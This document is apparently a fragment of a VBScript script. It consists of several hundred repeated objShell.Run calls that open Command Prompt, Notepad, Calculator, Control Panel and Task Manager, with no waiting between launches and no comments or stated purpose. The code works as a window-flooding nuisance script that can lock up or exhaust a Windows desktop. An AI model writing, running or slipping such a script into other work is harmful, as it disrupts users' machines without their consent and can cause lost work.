objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
